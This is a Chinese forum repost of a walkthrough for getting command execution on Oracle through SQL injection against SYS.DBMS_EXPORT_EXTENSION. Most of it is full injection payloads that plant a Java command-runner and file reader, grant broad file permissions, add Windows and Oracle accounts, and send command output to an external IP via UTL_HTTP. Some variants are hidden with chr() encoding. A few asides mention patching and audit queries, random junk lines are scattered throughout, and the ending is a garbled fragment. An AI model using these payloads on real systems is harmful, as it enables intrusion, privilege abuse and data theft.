作者:
admin
时间:
2012-12-18 12:21
实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
2 g0 j9 k; g; b, }8 h
/ _2 G! ^' X5 T# r
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
l* Q" z0 e' V7 g) D9 I
的形式即可。(用" 'a'|| "是为了让语句返回true值)
9 m$ n8 H7 ~( V. Y. x
语句有点长,可能要用post提交。
( c2 V, D: h4 N
以下是各个步骤:
$ e0 C( t! g5 q) r; f2 m! p
1.创建包
# _9 Q# x) K, I. M( }! V0 x
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件(本文的前提是该包对 PUBLIC 可执行且其内部的动态 SQL 以 SYS 身份运行,已安装相应补丁的 Oracle 版本通常不再可用;防御上应及时打补丁并撤销 PUBLIC 对该包的执行权限):
' I' d4 s8 n* ^% H& {) z' _; m
/xxx.jsp?id=1 and '1'<>'a'||(
* S' v5 i8 u; F3 G, t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 \, M+ ?+ `+ w7 @6 Q- r% o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
3 M0 [) h( D7 V3 a' u% F( {, f
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
7 i# v2 u0 f8 J) ?" X5 f: E
}'''';END;'';END;--','SYS',0,'1',0) from dual
8 G5 a8 R& a0 ~/ {- s- |4 }: z
)
4 w1 }! D& }' x4 f1 r# B ~& l% u4 C
------------------------
1 L3 {, ^& }- V4 H- C
如果url有长度限制,可以把readFile()函数块去掉,即:
- [: J. ?5 l0 t9 x7 G1 H5 k1 Z
/xxx.jsp?id=1 and '1'<>'a'||(
5 e0 c8 q$ m. j7 l! [/ q+ b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" W) F4 T1 A; M a. |( v
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
! D8 U) k W7 B+ z) A$ J# W( e
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
9 V# e% [0 u$ V" i, S
}'''';END;'';END;--','SYS',0,'1',0) from dual
( ?! ]* H$ n E% D' e% Q
)
, G) G% F1 m5 e3 q; u
同时把后面步骤 提到的 对readFile()的处理语句去掉。
6 s8 g/ E! n$ D3 M! P. ^
------------------------------
( V/ P# Z$ {) S; h% I& @5 M& h/ q
2.赋Java权限(注意:这一步把 java.io.FilePermission <<ALL FILES>> 的 execute 权限授予了 PUBLIC,该授权会保留在 DBA_JAVA_POLICY 视图中,后面第 7 步的清理并不会撤销它,DBA 审计时可据此发现)
7 p* i1 a# E3 l* ?! Q' }( M3 @; D# k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
X X' [0 s' `& P4 D
3.创建函数
: r' _2 e0 Z" m! Y" q8 X: X3 l
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ Y' ^0 b* }- `. ]. u/ d
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
6 s- \, M6 h: H7 I1 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 O4 O; |; y* S/ }' }3 d
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
, {- |6 M2 C* I
4.赋public执行函数的权限
2 t* g5 E' {2 F( V
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
, A# x9 u% \3 e+ O) A5 o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
4 g$ R0 J% S' p& w$ n S: N
5.测试上面的几步是否成功
) A+ n8 \( q# T9 I0 r
and '1'<>'11'||(
& h) @. m* o' u0 @
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
: S$ z( H; z0 }
)
2 ~: h# V, o# E" A+ E1 S
and '1'<>(
* ]& d* R: ]# C6 ?: F" b1 D4 i4 I2 ~
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
( _/ ~$ s; Q6 Q- B( A0 E9 [
)
) x9 |- F N/ Z2 d! w: H* e
6.执行命令:
z* U8 S" W. M% H1 d
/xxx.jsp?id=1 and '1'<>(
5 x: m+ L, C/ y6 S+ n
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
: s1 U& _ M- B, ~ s: I
& _" E/ B j+ ?
)
. \& @5 R( @! [& G. y
/xxx.jsp?id=1 and '1'<>(
' b5 ~5 e, x7 x, i! R! _
select sys.LinxReadFile('c:/boot.ini') from dual
- \% L6 ^$ B% r$ ~/ Y/ u) \
5 \0 g3 c; F' q3 W E
)
& i' S# j5 \; H q7 e4 Q
/ M$ w" Y2 w* a5 ~* t4 k
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
& l, \( }% S* U6 Q
如果要查看运行结果可以用 union :
& X1 l, P% ]" ^! M
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
. k9 ^* X+ i7 m4 u/ ]
或者UTL_HTTP.request(:
8 s5 `5 D) g! z( l3 {
/xxx.jsp?id=1 and '1'<>(
2 N/ G. z- A4 F3 N9 N
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
# a5 i! |+ Q# M, b( C6 h* i
)
; G7 O! O! ]0 k8 O0 ^4 L0 {
/xxx.jsp?id=1 and '1'<>(
$ |, o( b X& U# z5 g- U% ?$ d1 o
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
: F9 Y- L* U' [
)
/ K& ^' [- V6 a7 V/ _6 U/ f
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
, M6 K" k: K& [! m2 w
--------------------
/ P% d9 x' H* {# x6 A
6.内部变化
3 m h: x7 u% G5 h1 W) K8 K
通过以下命令可以查看 all_objects 表的变化(DBA 也可以用同样的查询排查是否被植入了此类对象;即使执行了第 7 步,LinxReadFile 函数和名为 LinxUtil 的 Java 源仍会出现在结果中):
; o/ O% t, @# C; ]2 k
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
" A1 Z6 e* c$ O
7.删除我们创建的函数
2 @2 ~. [, p* Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- e; ]) f# _$ h; h4 ~5 ]; Q
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
" t5 J3 O8 v: a5 ?2 I% H/ p3 I
====================================================
& T4 H( r ]) Y
全文结束。谨以此文赠与我的朋友。
$ U4 H5 {/ i* `3 k* d b* i8 Z! g
linx
* F9 O8 w& N# p
124829445
8 Z2 O) b7 R/ K6 Q5 `! s! ]
2008.1.12
" M' X" o- V8 r2 y$ C! ?3 t
linyujian@bjfu.edu.cn
# `' o1 h( M- t$ j
======================================================================
+ f6 t( R: N6 H0 Q6 K
测试漏洞的另一方法:
5 M* M2 F4 G; Q: v4 _; ]# k
创建oracle帐号:
+ K9 B) S/ [$ m+ i, o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& i H& a" S% H
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
9 \! m% B+ U* l( t$ R
即:
2 N& ?$ X( C2 ]/ ]0 ], Q3 R" F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
/ B# ~4 }# [8 l2 @5 T. n
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
! z1 ~6 k' U! l9 E
确定漏洞存在:
0 i. O* _; F- A' ?' F
1<>(
, F" E+ u' V2 f! g
select user_id from all_users where username='LINXSQL'
; f, Q4 n" u+ |4 S; s7 R% u# J
)
5 G* `3 F# c$ D7 _8 `% [
给linxsql连接权限:
- U! z' [! Y' s' d% |) b- N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 k; G3 D$ p/ x) u/ t
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
5 H5 {1 Z' f2 O6 w* t& Z( E
删除帐号:
8 r$ F0 t- ~& E$ ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 X' [9 M) T. S& K2 h# x& Q9 E
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
0 O. ^5 a. ?8 v4 R7 a. D8 ?0 ?0 W5 h
======================
8 R$ W) A; W- _6 n/ e/ L
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到的话可以考虑grant dba to 当前的User:
/ C$ ]- m, K/ r$ I2 g* o( c8 W( M2 p/ J
1.jsp?id=1 and '1'<>(
! V& ?- q/ A# Q" }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' `7 P! }: ]/ g
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
) C4 |( ?! e. p
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
$ k+ H! H }% B5 z
)
: \4 g$ c$ i* h+ n$ i* g8 _
3 d+ B' H; I1 G! Z, T
9 M g( Z1 ?$ c
! T. i( C5 z1 y+ g8 W